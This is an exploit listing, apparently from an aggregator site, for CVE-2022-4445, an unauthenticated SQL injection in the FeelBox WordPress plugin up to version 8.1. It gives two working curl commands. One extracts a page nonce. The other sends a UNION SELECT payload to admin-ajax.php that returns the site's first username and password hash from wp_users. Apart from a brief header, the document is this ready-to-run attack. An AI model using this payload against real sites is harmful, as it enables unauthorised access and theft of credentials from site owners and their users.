Exploit for FL3R FeelBox <= 8.1 - Unauthenticated SQLi CVE-2022-4445

Name: Exploit for FL3R FeelBox <= 8.1 - Unauthenticated SQLi CVE-2022-4445
Rating: 5 (112 reviews)

2023-01-20 | CVSS 9.6

## https://sploitus.com/exploit?id=WPEX-ID:9BB6FDE0-1347-496B-BE03-3512E6B7E8F8
1. Visit a blog post and extract the nonce from the source (search for "feelboxAjax", and extract the "token")

    curl -s 'http://127.0.0.1:7777/?p=1' | grep 'token'

2. Invoke the following curl command, with the just obtained nonce (token), to disclose the first user's username and password hash:

    curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=populate_post' \
        --data 'token=<NONCE HERE>&postID=1 UNION ALL SELECT 1,1,CONCAT((SELECT user_login FROM wp_users),CHR(0x3a),(SELECT user_pass FROM wp_users)),1,1,1,1-- -'